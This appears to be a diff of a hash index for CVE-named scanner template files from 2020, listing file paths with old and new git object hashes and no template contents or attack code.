http/cves/2020/CVE-2020-14092.yaml:75a0892c9809a6c1abd7e4cc3d799a44cb88399d -http/cves/2020/CVE-2020-14144.yaml:232339f4f5191691b8b16580391a49717e779d5b -http/cves/2020/CVE-2020-14179.yaml:4e93a22716357304e957bfa02e356119aa97f1e6 -http/cves/2020/CVE-2020-14181.yaml:5aac59f062cea4a6193264b96db2e82763636741 -http/cves/2020/CVE-2020-14408.yaml:6b2bcebab60d604df03b9f427ed6fa995f13042c -http/cves/2020/CVE-2020-14413.yaml:99aa2e3bc663710df4af68cdcd71b96cba2f32e9 -http/cves/2020/CVE-2020-14750.yaml:21a5e8dd00a261630d45d87f0f4f8855ccb6e7ef -http/cves/2020/CVE-2020-14864.yaml:4f0476bf5c9e8a7bcdd20cd16789bcad1f410c56 -http/cves/2020/CVE-2020-14882.yaml:7e7a672e31e986f4856822c0519953c8a614ce30 -http/cves/2020/CVE-2020-14883.yaml:32c20e2dd8ddfbe30b90e17f558c10beb4e61bc5 +http/cves/2020/CVE-2020-14144.yaml:de3bf41f10763111ab2ac8678715443f14755a1e +http/cves/2020/CVE-2020-14179.yaml:7c170559bfd46eb1f098ecd9433cb5962fe39d77 +http/cves/2020/CVE-2020-14181.yaml:a7670d91dac7816bc358f8c2bcb62a859b1aa8d3 +http/cves/2020/CVE-2020-14408.yaml:5ecf5a403a71a2a2ee721a0e9665bec2a4d0892d +http/cves/2020/CVE-2020-14413.yaml:1bd09b57c6c8840e671826d3d320fc072496823c +http/cves/2020/CVE-2020-14750.yaml:ef8663d1cfe855ac0400166121b550a2bb617309 +http/cves/2020/CVE-2020-14864.yaml:87bf1db7002cd028bbaceb5edc5e5388e676a2e9 +http/cves/2020/CVE-2020-14882.yaml:3aee0708f2ae7f6ee9d9d98036ef6600df3f93e1 +http/cves/2020/CVE-2020-14883.yaml:3e3d7b25a3bccd2e874fe539d1dcf5efdf13598f http/cves/2020/CVE-2020-15050.yaml:ff53982b1660dbacf0082093c19954ccd1597228 -http/cves/2020/CVE-2020-15129.yaml:3ff00f8b3d55faba5fdb1f72565ad7de3bf36279 -http/cves/2020/CVE-2020-15148.yaml:b5c6c9f741006d8b8c8e55a5c6c8cc0dbd625848 -http/cves/2020/CVE-2020-15227.yaml:eaeaae62f02a0f034a5475c01e381f0388f86adf -http/cves/2020/CVE-2020-15500.yaml:1738a4c203283a8bcb8a25e3f3cf2dc81a621b82 +http/cves/2020/CVE-2020-15129.yaml:c07785a9275455945fe8e675e5833c4ed124ec93 +http/cves/2020/CVE-2020-15148.yaml:e453aabff7dfda3a671b847d7b2648e2ab52ed3f +http/cves/2020/CVE-2020-15227.yaml:ed721a2d4c39a7b1231ca59f538153370217532e +http/cves/2020/CVE-2020-15500.yaml:b80e7228d9b90fc7824b871f8b16eb6c3ac6ec32 http/cves/2020/CVE-2020-15505.yaml:e6a491c737cc161a2f84ccf4adebee81a745337b -http/cves/2020/CVE-2020-15568.yaml:442ec79083e8b99d8b29da21c9c38dd919b309b7 -http/cves/2020/CVE-2020-15867.yaml:fe723ce37c2ba0ac50ff700f5a4ba1371a3eec43 -http/cves/2020/CVE-2020-15895.yaml:45e601b34a388c34fde98e9b4e4054e5b98eeadb +http/cves/2020/CVE-2020-15568.yaml:203c9a51e859837c893bdfb5eba736406670420f +http/cves/2020/CVE-2020-15867.yaml:25c54a61eedf2580bbf2304c6ab3c3f6ba945654 +http/cves/2020/CVE-2020-15895.yaml:2e8edcabc2258180e398d26769c2a347d21a9e09 http/cves/2020/CVE-2020-15920.yaml:b9bce590c1d6a4a2950e930ec84e5bd343fd1cf1 -http/cves/2020/CVE-2020-16139.yaml:4a8efd3ef6dd8500daf053805bb24fb9819b26a4 -http/cves/2020/CVE-2020-16846.yaml:1fd77554281c1da9cd827d1f3c29220efd0d1d35 -http/cves/2020/CVE-2020-16952.yaml:32d858972d7dd34075112ad9a2cf8b3916460c54 -http/cves/2020/CVE-2020-17362.yaml:1d3d60e49940794b9fc0c15ec254846c665defe9 -http/cves/2020/CVE-2020-17453.yaml:37d98425ae2b18c9ae19efa9af4bc64ad8ed8143 -http/cves/2020/CVE-2020-17456.yaml:0f62d8efa95a601406024e42d83c353c172a7fbf -http/cves/2020/CVE-2020-17463.yaml:0aa9fae26f8ce93664afcd7f6d15961c05035b23 -http/cves/2020/CVE-2020-17496.yaml:6592a067f97d7e21fa7b0b9fd51fc7a72bcfa347 -http/cves/2020/CVE-2020-17505.yaml:cde2f5e2251520ffcc5942e408e18fdf03c1a87e +http/cves/2020/CVE-2020-16139.yaml:47491567138b40f513976c442a929d1a1d45e20b +http/cves/2020/CVE-2020-16846.yaml:ed64b05db25e3391086736114330fca043564cf7 +http/cves/2020/CVE-2020-16952.yaml:855ef66059d537f337c286915ff3ecef82724d73 +http/cves/2020/CVE-2020-17362.yaml:12e90856b34ac06db9d68a267c83442f8b36dc97 +http/cves/2020/CVE-2020-17453.yaml:54e710d28087b56a97932478496448fc392951bc +http/cves/2020/CVE-2020-17456.yaml:e4d357ff92d873d41376c7b79a1f518893df1e45 +http/cves/2020/CVE-2020-17463.yaml:29e89de402c5bf2755d1203ec543c8a4c6d5836d +http/cves/2020/CVE-2020-17496.yaml:f2c8075b728119cade8e9670db347e016d0ed081 +http/cves/2020/CVE-2020-17505.yaml:3fc856c405b9d3ce267495bdf84d6cf8450a8698 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a http/cves/2020/CVE-2020-17518.yaml:d81d48cbbd5df9824834f232c4c3ee0ecbe19d6f -http/cves/2020/CVE-2020-17519.yaml:4d3a9f2c5601d363354904ea52d3189359c2b795 -http/cves/2020/CVE-2020-17526.yaml:27f7c46e2774072cc274e38b793b0e90a4c69faa -http/cves/2020/CVE-2020-17530.yaml:0fa2e949d5d30f0d5736a0b8f5ddbb5cf98f31d3 -http/cves/2020/CVE-2020-18268.yaml:04551264e8c8de4c13a0a0854d0f265e180d1941 -http/cves/2020/CVE-2020-19282.yaml:68c868264d3131edc651940d64c2772f62ef88ad -http/cves/2020/CVE-2020-19283.yaml:1c37358907fcaa4b0f3d603b62c270bed40eda5c +http/cves/2020/CVE-2020-17519.yaml:28253c1983a82cee042980cfd0bef149fabf7ed6 +http/cves/2020/CVE-2020-17526.yaml:4ba2549b99a0073f587f3ac9420153e7ecedf330 +http/cves/2020/CVE-2020-17530.yaml:0824e5803fd53b497a41a4ee6a5dbfdc19eaea83 +http/cves/2020/CVE-2020-18268.yaml:cca1efded5674d028862ae277702b184c2fc5686 +http/cves/2020/CVE-2020-19282.yaml:70979b7fd446e0900faa2e234ecb470753dfd262 +http/cves/2020/CVE-2020-19283.yaml:1e5211578ecb8ecc871c90a65975e7b45d7f9758 http/cves/2020/CVE-2020-19295.yaml:60d3dd84486b18da0358042732bec6e88c6cc771 -http/cves/2020/CVE-2020-19360.yaml:7014cdc64af9bfbc5c152f9f453d47a132666ab5 -http/cves/2020/CVE-2020-1943.yaml:2282152a4f0bcb17001d0372f9951dddb0f10d7c -http/cves/2020/CVE-2020-19515.yaml:4a24ba4de43c7f167f31639ca1e46e2977915da3 -http/cves/2020/CVE-2020-1956.yaml:22b456c48aacfadf48aabad952c9f5257f87177f +http/cves/2020/CVE-2020-19360.yaml:f54f5ab5917adf0baba0eea9ffb25ae6ab7a2dbe +http/cves/2020/CVE-2020-1943.yaml:832060129d1f3c91a51f41a15d7f1943944641eb +http/cves/2020/CVE-2020-19515.yaml:c74e6d116ade83c782a813e739811e563ff39756 +http/cves/2020/CVE-2020-1956.yaml:e208ea1467b8d468e37bfcfb9911a1f965cd7572 http/cves/2020/CVE-2020-19625.yaml:c838f4924ba3563572ed00d81634424490d317b4 -http/cves/2020/CVE-2020-20285.yaml:b6c545431fb07b659b0740ca1206d86eef876eac -http/cves/2020/CVE-2020-20300.yaml:4b80ad33a19faec897d204dd956c38c3c7461c02 -http/cves/2020/CVE-2020-2036.yaml:63364cbd854896ccce675a603378645fea8e686f -http/cves/2020/CVE-2020-2096.yaml:52eb954378ae0998d3a908bf72ed67355b934311 -http/cves/2020/CVE-2020-20982.yaml:1aace0196324f38b7dcc07d2a444b7f767a33d6e +http/cves/2020/CVE-2020-20285.yaml:97c2daa0903995155b3c319d2cedeec2477bb5b8 +http/cves/2020/CVE-2020-20300.yaml:9695e60a614334c018bc667dc010c9f01ca59913 +http/cves/2020/CVE-2020-2036.yaml:2df878088d96ad05fcdee31970fc4aa430666c88 +http/cves/2020/CVE-2020-2096.yaml:604550a7f7977ee5e1980ab807019da472433fa2 +http/cves/2020/CVE-2020-20982.yaml:8bd093282b67d342b92002a85e671108b46a2608 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 -http/cves/2020/CVE-2020-21012.yaml:63cdf53dc3011d2e4f17dc6ff3fe6afb66125f1c -http/cves/2020/CVE-2020-2103.yaml:c866a49b214f1cfed903c0062d10b8faa39f086c +http/cves/2020/CVE-2020-21012.yaml:eb38856f0cd1394e96a25ad58747944fc74e9d06 +http/cves/2020/CVE-2020-2103.yaml:b4b23de5027241fffef5e5c9699760de8ded2d45 http/cves/2020/CVE-2020-21224.yaml:9215850ea5836ba8924a9492ebfdd2f6a56e0ecb -http/cves/2020/CVE-2020-2140.yaml:f1b74ecc13fd2f79358b0ca1177b2434bdf4353b -http/cves/2020/CVE-2020-22208.yaml:037d6e3b5b8a6449066343119880a71dafd0d96d -http/cves/2020/CVE-2020-22209.yaml:5f24a93238d2dc488d4e2efd9067e0eb15db5e47 -http/cves/2020/CVE-2020-22210.yaml:773af5166e3b94fed49f1dbb1836c5dc1a1c733d -http/cves/2020/CVE-2020-22211.yaml:c9dc3f655c6fff920a8bfc6268c00239e03a2395 +http/cves/2020/CVE-2020-2140.yaml:a64a2b9363ac7e1dad3fe84be28242a52d49d610 +http/cves/2020/CVE-2020-22208.yaml:18bc41bafd7e5cf4fd8298da2627cce27ec09a33 +http/cves/2020/CVE-2020-22209.yaml:253697c3e817bc5f4fb695cf2e14319bfa55358b +http/cves/2020/CVE-2020-22210.yaml:7da9ba29c3ea1f1fc49d299c58d706588985ec7b +http/cves/2020/CVE-2020-22211.yaml:23709d74423456f7096fa167921c7470d6b27613 http/cves/2020/CVE-2020-22840.yaml:6c6cad1388bb2ab7192fec9a483e3a8f3edb4547 -http/cves/2020/CVE-2020-23015.yaml:8a9f361ae5312e7a9f82787f4ef31fee5071e12c -http/cves/2020/CVE-2020-23517.yaml:3fad85a5e6bc0031f20f19c68f69c17c55e99449 -http/cves/2020/CVE-2020-23575.yaml:cf0eebcabfd2a14779c5a99b202b6d7fec1cd0c1 -http/cves/2020/CVE-2020-23697.yaml:cd022bc02020a7310cff8c2ee13657da03db8ea2 +http/cves/2020/CVE-2020-23015.yaml:b3346c6e48dedf09b34f6536a4587e45ca64bce6 +http/cves/2020/CVE-2020-23517.yaml:73756be29508961bb810d8e834dbc72405a9b795 +http/cves/2020/CVE-2020-23575.yaml:34feab963e6f827c990da7425411850158b98da7 +http/cves/2020/CVE-2020-23697.yaml:66c34a7b7282b992e375c0744730d026682142fa http/cves/2020/CVE-2020-23972.yaml:c1383a5e782d88347b1ace6499e3c8e148aad5c4 -http/cves/2020/CVE-2020-24148.yaml:30d9b54e95437674a99934884c344346407aeb06 -http/cves/2020/CVE-2020-24186.yaml:0df340a998fd62977e1212168fc7630523b243aa +http/cves/2020/CVE-2020-24148.yaml:68cd11ce743eac9ed781b865de8a9d6f066af84e +http/cves/2020/CVE-2020-24186.yaml:6d6d875a225e3d8483cedea3d18be5d10eed6668 http/cves/2020/CVE-2020-24223.yaml:3dcce16e9d8be524d4f16ebc04564135e16a5df3 -http/cves/2020/CVE-2020-24312.yaml:b12e6e7427aab4161e503e980266b06e310e1b75 -http/cves/2020/CVE-2020-24391.yaml:4826fdb4cbc387091a4b6910c656ca28ee4fa8bb +http/cves/2020/CVE-2020-24312.yaml:64454cabae9f19c9ff900daf8206d16dcfd97091 +http/cves/2020/CVE-2020-24391.yaml:3cd35fe6417b0647ce50bbc4a16996c8c8981fb2 http/cves/2020/CVE-2020-24550.yaml:df5052c65b1037f38f8ed25cb384ec4c54f81b8c http/cves/2020/CVE-2020-24571.yaml:5c31b80a9c7ae3e327ea91a5112b930676527155 -http/cves/2020/CVE-2020-24579.yaml:b14163aa9fd9a719222ab84fb26922cfcb6ec34f -http/cves/2020/CVE-2020-24589.yaml:c9ac42289b48867230e7a71e71a3ec15f13810fa -http/cves/2020/CVE-2020-24701.yaml:80a65cf66052fd8baf16135e65607ebe1a2414a1 -http/cves/2020/CVE-2020-24902.yaml:74db5481ad162517957f9532be52d35b10b4afb9 -http/cves/2020/CVE-2020-24903.yaml:aa2603a18720cf82736d7efcac16af5b78c66117 -http/cves/2020/CVE-2020-24912.yaml:813d76d812945969022e1f3d6cda02d99d103a61 +http/cves/2020/CVE-2020-24579.yaml:bd9a169a4c1af3ff65b5466200ab4d7989af7a04 +http/cves/2020/CVE-2020-24589.yaml:d26d02bb554d34740163c2cb502b03bd0bb108c0 +http/cves/2020/CVE-2020-24701.yaml:e39f30359517b3d238c0f047b7ded94881e69a14 +http/cves/2020/CVE-2020-24902.yaml:1259b4854191d05b01caa8d1b7f1e845b6cd04cf +http/cves/2020/CVE-2020-24903.yaml:89bf3a81d901c9d7364475f05800d40065327228 +http/cves/2020/CVE-2020-24912.yaml:a5df47738a105f4c07e66c50d21622c2fb4d8ed9 http/cves/2020/CVE-2020-24949.yaml:75e53db8ae949b1e8991bcf5b51fc2afd196c6bc http/cves/2020/CVE-2020-25078.yaml:d2e80d7483241efcdeaeec253eee58e18089501b -http/cves/2020/CVE-2020-25213.yaml:06724bab3f1553f0ee5d004d212384d823431886 -http/cves/2020/CVE-2020-25223.yaml:78d9e33f8f1920c4e6f4001dcd54556a79499b46 +http/cves/2020/CVE-2020-25213.yaml:cc2572578c2f5bf8269c6b208b3939987c2d18ef +http/cves/2020/CVE-2020-25223.yaml:b2c1068143116b03e67b909cb00887d396c28d92 http/cves/2020/CVE-2020-25495.yaml:046e0a535a8b9fd74f70e1ff2d90dbef6e20c658 -http/cves/2020/CVE-2020-25506.yaml:f85eeae591d25bb1e8d5f88cceed5a66c16a10ee -http/cves/2020/CVE-2020-2551.yaml:bd62e08c6adbd1c4966d7211913245d13fbbd0c0 -http/cves/2020/CVE-2020-25540.yaml:02142adf2e6fed198216c5c5acfc5e326991f584 +http/cves/2020/CVE-2020-25506.yaml:27620edd7c191f6c5f918ec2546c7de54e9124cb +http/cves/2020/CVE-2020-2551.yaml:2b7bf0bb7f84d06e15d8d41c964ad58491c0126f +http/cves/2020/CVE-2020-25540.yaml:b1b69542b3b044d72ae7f85052d20bd2922056eb http/cves/2020/CVE-2020-25780.yaml:3983db60c1ca28a8c7999041013ab96f5c896a9f -http/cves/2020/CVE-2020-25864.yaml:c1bdc0664f80de11fff27421237c0535e2f4471a +http/cves/2020/CVE-2020-25864.yaml:7ba0c416fbc580ffa8eb8f8fc337a77cd4a76b6c http/cves/2020/CVE-2020-26073.yaml:793eb5c47388abfea3111d98fc083ef549f2f51f http/cves/2020/CVE-2020-26153.yaml:455c58760238ddd079e51172072ef963e95e58ec -http/cves/2020/CVE-2020-26214.yaml:5f85dbd16a6a6d114db080f100a90520a476776a -http/cves/2020/CVE-2020-26217.yaml:96da67a423881f8fb5c4316f2b8bbd1c34f127bb +http/cves/2020/CVE-2020-26214.yaml:e15fb53018e98df0c349367eab19c2ae3d851d77 +http/cves/2020/CVE-2020-26217.yaml:8d3e7b139f7edff0496b2776f409f072bf153d55 http/cves/2020/CVE-2020-26248.yaml:7c31fd4f253b81b3afe18098ea3b7db896f1efd7 http/cves/2020/CVE-2020-26258.yaml:da846b0baeb41eb83b4c8ac05986b1eb0be6a1af -http/cves/2020/CVE-2020-26413.yaml:ca0dc80567bdd3117829bd8e18ea093db63620a9 +http/cves/2020/CVE-2020-26413.yaml:c6ae98d72b9daec71461b2c86159c469efa8fb32 http/cves/2020/CVE-2020-26876.yaml:cddbbb81ba783c1c427b257e9caae9d9c0fa976a http/cves/2020/CVE-2020-26919.yaml:1f958ae88864447bcb937900bf0a813a033204b5 -http/cves/2020/CVE-2020-26948.yaml:78f28dda3b7f85105f54071d74b6bc355436bfa9 +http/cves/2020/CVE-2020-26948.yaml:cdadfb9ba6724ecfdd94740c729a0e0c443a3036 http/cves/2020/CVE-2020-27191.yaml:4de1b9dd94d0973bfb7b1e6315d254603c5f1765 -http/cves/2020/CVE-2020-2733.yaml:2f525b0f7a4ae60208a0da7dcc630c9822fded40 +http/cves/2020/CVE-2020-2733.yaml:a448094a7e74f2e3b6604186adbca425e3cec908 http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371 -http/cves/2020/CVE-2020-27467.yaml:500caabbd87e671d7091385a19c4040ea34c3784 -http/cves/2020/CVE-2020-27481.yaml:34dead4abe08a5b77da5e0f75b746ba0fae11a31 +http/cves/2020/CVE-2020-27467.yaml:e190b3c2d91f742f916a82030de9b4d8221b4e9b +http/cves/2020/CVE-2020-27481.yaml:1c6c8f8e84d22f9aa0ea5d634a3adff940839765 http/cves/2020/CVE-2020-27735.yaml:c11acea90495bacb3b3e5cd069b49cbc543621e7 -http/cves/2020/CVE-2020-27838.yaml:09845d829da92f52ad39528ea72893106622646e -http/cves/2020/CVE-2020-27866.yaml:244c0b65ec85e620c013652da2ea6f378377d938 -http/cves/2020/CVE-2020-27982.yaml:aecf509f176fd6c8e7c487b487117399629aa3d3 -http/cves/2020/CVE-2020-27986.yaml:036d75b12b2e84ef9e8c9cc2eec3c3f92b87e57b -http/cves/2020/CVE-2020-28185.yaml:f1febab1b85d4233b3e72aa0d2719fa95708c8a6 -http/cves/2020/CVE-2020-28188.yaml:7b8274a1d7744a0a3751bdbbad8bf018231c9f67 -http/cves/2020/CVE-2020-28208.yaml:572cd573f91a14a49aafbe46ba917ab4fb22ad8d +http/cves/2020/CVE-2020-27838.yaml:f5d793dca6b37d410967a3a4c355b9aec9093594 +http/cves/2020/CVE-2020-27866.yaml:48b6550611c83a6d35f2437e66a0031e51f1930a +http/cves/2020/CVE-2020-27982.yaml:a1e9d4dd0d75d6209feb856df302363ff551e7d4 +http/cves/2020/CVE-2020-27986.yaml:c2668ca4f159f3302764e6c01bfb8b0303aed21b +http/cves/2020/CVE-2020-28185.yaml:2dca6d757d0230f6e3c009fd75d047a5c2d41c07 +http/cves/2020/CVE-2020-28188.yaml:9328f627c742f2eba1355c3f32f933281654dfb4 +http/cves/2020/CVE-2020-28208.yaml:17f8f9f3851d089ed3ba72296ebb1901169322b4 http/cves/2020/CVE-2020-28351.yaml:16f3808bf7037eee165ff817b9032b07cff97715 -http/cves/2020/CVE-2020-28871.yaml:86f474bb8d7bf2e7681e261a4b18a4f3d5dde805 +http/cves/2020/CVE-2020-28871.yaml:67720a0089ca532649039c13100df95c7a7bc194 http/cves/2020/CVE-2020-28976.yaml:598019c32cb4b0e55d77f7c45f1ba39593debba3 -http/cves/2020/CVE-2020-29164.yaml:78b7cbf695b31728ea725272c47836d48e8d9c1f -http/cves/2020/CVE-2020-29227.yaml:7aae495d9f31d8b89aa729114fc84b8ec90b261e -http/cves/2020/CVE-2020-29284.yaml:f0ab6a4525f226698c518fa2dd197052ada04595 -http/cves/2020/CVE-2020-29395.yaml:c9356abe925071b30dd95d153a4f17b2c0d91fd3 +http/cves/2020/CVE-2020-29164.yaml:a7821d97ab89dafa618381c5df70b60fd8657b44 +http/cves/2020/CVE-2020-29227.yaml:122475843b9e415cf59e2ed0b4dc9b2ac9c00cb4 +http/cves/2020/CVE-2020-29284.yaml:20abe2012386881cc230cd068b1fe4084fc25f5b +http/cves/2020/CVE-2020-29395.yaml:b0aa043c5646021dc76bb08b9b1e1ba1f8a569bc http/cves/2020/CVE-2020-29453.yaml:36f8bba4fdee54e96e54f2132471c8bddf38fdb9 -http/cves/2020/CVE-2020-29583.yaml:28807dae67b58b07d4ef1d9489d52712220bc6bf +http/cves/2020/CVE-2020-29583.yaml:1eb6c3ab90222daf4aa8b2b2599b0d11e7db9086 http/cves/2020/CVE-2020-29597.yaml:0784e4768d628b088948e4409de7690b6b28dc4c http/cves/2020/CVE-2020-3187.yaml:633d566201388dc1399f783b58cfc07f94d4aa51 -http/cves/2020/CVE-2020-3452.yaml:ac8abaf42a386b4a553ca6b67a8503127d95c03a -http/cves/2020/CVE-2020-35234.yaml:6ea1a63fa01e3e96a6c1c8c3d6f2606d28b674f9 -http/cves/2020/CVE-2020-35338.yaml:84030a349ba5130c8e46ba857b4ce6446430168c -http/cves/2020/CVE-2020-35476.yaml:409ea669737df2f38110b767efcaff63c57df28d -http/cves/2020/CVE-2020-35489.yaml:dec219f1d8f0827e62cb6541a6e8c0dcfc1824f6 -http/cves/2020/CVE-2020-35580.yaml:328a051b2509ed190e2932f49eff871fbb4a9e5f -http/cves/2020/CVE-2020-35598.yaml:9657326a3e65b7c9812d05b6926b98d2f6786430 -http/cves/2020/CVE-2020-35713.yaml:1e2ddca44761e0a5a52e8c51a7693291a8a78166 +http/cves/2020/CVE-2020-3452.yaml:462a13a55603fea601a5eb04361ebb262a5ae885 +http/cves/2020/CVE-2020-35234.yaml:e4bb78015e568be11dc80c12b7f7c6482b2ba820 +http/cves/2020/CVE-2020-35338.yaml:41c7d218db18df546ef3f07ef88cf08fa1fa7d5c +http/cves/2020/CVE-2020-35476.yaml:26ffaf11a97ed264f91c9bf66bb10aa8a5e34c80 +http/cves/2020/CVE-2020-35489.yaml:1f8813c310acbbae92d71094491480f81093c9a1 +http/cves/2020/CVE-2020-35580.yaml:752ba7e807215ff1529be07163304e5a8ea77681 +http/cves/2020/CVE-2020-35598.yaml:fa4d75367df143b4d76d19189fb76471e81fb318 +http/cves/2020/CVE-2020-35713.yaml:04bd22c97e914a61aa173271bcc13b87474b2cd0 http/cves/2020/CVE-2020-35729.yaml:c7598a948f72654439744155ace7dfe699bba00b -http/cves/2020/CVE-2020-35736.yaml:04704013756f8f1485432e4cadbc9660a421c3d8 +http/cves/2020/CVE-2020-35736.yaml:0595a14d942c7a19718ad31a79b197ca18066615 http/cves/2020/CVE-2020-35749.yaml:8c7c7cb6375f279b172fd6db9e37182ff10b0d3d http/cves/2020/CVE-2020-35774.yaml:04828fe9dc9b3cc64c404c9f22d4f2c4746cb04f -http/cves/2020/CVE-2020-3580.yaml:696b0e39d81f0862777d8df4d18fd4d7a2fff9b0 -http/cves/2020/CVE-2020-35846.yaml:00456720e23642764af469731d595e94e6bc18a0 -http/cves/2020/CVE-2020-35847.yaml:b686652e29308d9b9881239e1cc13effa32c980a -http/cves/2020/CVE-2020-35848.yaml:6271501b7f85396c06fb139352bd7a631f5cf73c +http/cves/2020/CVE-2020-3580.yaml:5c17b9207ede49ea379376451f152493405eff3b +http/cves/2020/CVE-2020-35846.yaml:ad9de8cafbad528bd0f4f922e27014c92520ac09 +http/cves/2020/CVE-2020-35847.yaml:4636a8b6bdb0fe4822f990c002df088e792e6c63 +http/cves/2020/CVE-2020-35848.yaml:3afcd9e68aebe83507ece244d39fd96365f70338 http/cves/2020/CVE-2020-35951.yaml:8a82a09c399a210010151ef2b26290cb8b3c32dd -http/cves/2020/CVE-2020-35984.yaml:4278c822236b24641a6008d1b7782ad9418b2ea2 -http/cves/2020/CVE-2020-35985.yaml:492b98abfcee22e2acfff34e597ade82696296d1 -http/cves/2020/CVE-2020-35986.yaml:96a23047c7e1a64cad1eb611a264a1f206b405c2 -http/cves/2020/CVE-2020-35987.yaml:f931d41361de5b89071b6172a88d5a7a13805a82 -http/cves/2020/CVE-2020-36112.yaml:23ce3f6b15cfdd9701f981ab2c556e52049715fd -http/cves/2020/CVE-2020-36289.yaml:4524594df1256ccf61dd15df6dd9dd4aa128d797 -http/cves/2020/CVE-2020-36365.yaml:871f5fcd44da634196c2988f8099e0f8060a391f +http/cves/2020/CVE-2020-35984.yaml:93e524409cf0b23db0b70db6f0094cfba52efb13 +http/cves/2020/CVE-2020-35985.yaml:ce48524c08b761ebcc575ef02765314669b5b30d +http/cves/2020/CVE-2020-35986.yaml:c76e52d22ba5e6d8fcc101ed81be8d25dce67962 +http/cves/2020/CVE-2020-35987.yaml:8d0b095e54b481e7d92d1a54504349d00471b8b1 +http/cves/2020/CVE-2020-36112.yaml:f2bf094fac8f1cdfe6a1a346cdbe6be8c7601124 +http/cves/2020/CVE-2020-36289.yaml:d297dd28860670463adcfcf6672f82e9faa1eadc +http/cves/2020/CVE-2020-36365.yaml:9a13b03b380ad3e190bfe456dd8c9e3628778dd2 http/cves/2020/CVE-2020-36510.yaml:43288de50cb0daa7560d3c49ab9cb662ec943aaa -http/cves/2020/CVE-2020-4463.yaml:11b5d85cc0e83f550006b8bf0d6cc0a6407490bd -http/cves/2020/CVE-2020-5191.yaml:bbbfdc55968de598c727dc69b25e20dca1344a80 -http/cves/2020/CVE-2020-5192.yaml:04c9004b000491bcf959be292298a2bc9e52033c -http/cves/2020/CVE-2020-5284.yaml:92aab171880d0c49c754162851b66e9a1947823d +http/cves/2020/CVE-2020-4463.yaml:ba0839c3361367e1ce876c8964a18fd9822b4c18 +http/cves/2020/CVE-2020-5191.yaml:0f273b6b9bfac5701e3dda3504bd7f642d9265fb +http/cves/2020/CVE-2020-5192.yaml:b186c3cb44c730fb83ebafec8bdc72e706e559a1 +http/cves/2020/CVE-2020-5284.yaml:e0f1b069ab0fc3bc4860d6f29c8b66e56fd6c17c http/cves/2020/CVE-2020-5307.yaml:5f2c1c7f8182d01ef6c0cab9b090f901f4e91865 http/cves/2020/CVE-2020-5405.yaml:362a063401b8e384df88fcc1f958163e9d355922 -http/cves/2020/CVE-2020-5410.yaml:b3d892f8caa9a9dc7ae499ae3846ea95bcd259b7 +http/cves/2020/CVE-2020-5410.yaml:ee5446048d5570981b1f589cfb8ac45765961762 http/cves/2020/CVE-2020-5412.yaml:52fe5ee1514d295e0ed4f0e29db378764c447047 http/cves/2020/CVE-2020-5775.yaml:cbcbf5ab4ce79076fa4f024290982f26ab44323c http/cves/2020/CVE-2020-5776.yaml:ddddb7cd7126aa41e107c0211722da5abebeb87f -http/cves/2020/CVE-2020-5777.yaml:a7535c371c0fe0706c73037a47b12de19ce5794d +http/cves/2020/CVE-2020-5777.yaml:fb86884641fca57dacff56448df790c077a8016b http/cves/2020/CVE-2020-5847.yaml:8a1c0ba47de6c6cd63ede6605bd99f7f7d2bc88a -http/cves/2020/CVE-2020-5902.yaml:2520f1d294f8a81758197f7daff7c8e0be670066 -http/cves/2020/CVE-2020-6171.yaml:bb35d476070fef94d784cd0a23d602db49328d02 -http/cves/2020/CVE-2020-6207.yaml:3bf92a4fd7c258c5bb6b938b94ab2b5f5a5a0fb8 -http/cves/2020/CVE-2020-6287.yaml:2edcf5c74a421df1ac9219cb68298dbcb2fe7470 +http/cves/2020/CVE-2020-5902.yaml:fd6fead0ec016d1c3250bd3639df8aa3e3d7a3c6 +http/cves/2020/CVE-2020-6171.yaml:3b54178dd588febab96bc70b34ec3a9684031593 +http/cves/2020/CVE-2020-6207.yaml:88f82f2f4117df59a21bee30dabc2dbbbd55752a +http/cves/2020/CVE-2020-6287.yaml:7a1d843909ee9d794e9e8c541625d5522d360537 http/cves/2020/CVE-2020-6308.yaml:662c78d7be59c6090f8ab983b9aecbe01757cae6 -http/cves/2020/CVE-2020-6637.yaml:457b0ab917393f60b1e81126c83e7d5115c17d52 -http/cves/2020/CVE-2020-6950.yaml:edaec70c14663353167510b6114895064ab7731b -http/cves/2020/CVE-2020-7107.yaml:0883f31e3f93de49c77c8038e650b46fdfaa6222 -http/cves/2020/CVE-2020-7136.yaml:6cb8a43e73fd9cb8f5b9dcef3f499941f013951c +http/cves/2020/CVE-2020-6637.yaml:028c3cea7cb4b979332c21866571714765fc3eda +http/cves/2020/CVE-2020-6950.yaml:fd7c7f30283610f8b86244eb4b0849da960e6e2e +http/cves/2020/CVE-2020-7107.yaml:1214b3094b6e6ac77539f71ee51c3585315222d8 +http/cves/2020/CVE-2020-7136.yaml:dc5c71c2c26cb8517198425acbdf352592e05265 http/cves/2020/CVE-2020-7209.yaml:0f6026d48cd89d6faa187af05d42c9518f7a48ae -http/cves/2020/CVE-2020-7318.yaml:8eb4d4ceca2e89ba39c77e6de650bfcfb4973af0 -http/cves/2020/CVE-2020-7796.yaml:3d10416f40c7f342301d5e2d3eb8be37ed377db1 -http/cves/2020/CVE-2020-7943.yaml:6c48b1bea21ccff1be86ecfc9ba9e3bc76c07794 -http/cves/2020/CVE-2020-7961.yaml:ddc3ea036c1c6429bfe3ee5b62bbd645e6514c66 -http/cves/2020/CVE-2020-7980.yaml:86d8d7f9eec530b603c8bc9217987daa02ce29f8 -http/cves/2020/CVE-2020-8115.yaml:6da07e069a340ef3b0ec0158d64f8f60768b00c1 -http/cves/2020/CVE-2020-8163.yaml:e0220eb7c18de2dc249930fa071c65840fd5c5e5 -http/cves/2020/CVE-2020-8191.yaml:63ca6d389cb61a449922c860de0d0a2bcb06634d -http/cves/2020/CVE-2020-8193.yaml:3434281d9705a6964efceb43e95704d3a8367669 +http/cves/2020/CVE-2020-7318.yaml:0ee84af039d5d27f45bc0ce4a628b2550a80fd8e +http/cves/2020/CVE-2020-7796.yaml:f4b073f23fbc79d82d2d3701ea96ec2904587faa +http/cves/2020/CVE-2020-7943.yaml:7c1a1baf25d423ad09a63cd8e4c6930d58ed9626 +http/cves/2020/CVE-2020-7961.yaml:63a1bbbdf1b6a0a9e831502b6f6cadf992fc043e +http/cves/2020/CVE-2020-7980.yaml:becc3ce799e1d9d704840752e31c1b38ac0f651b 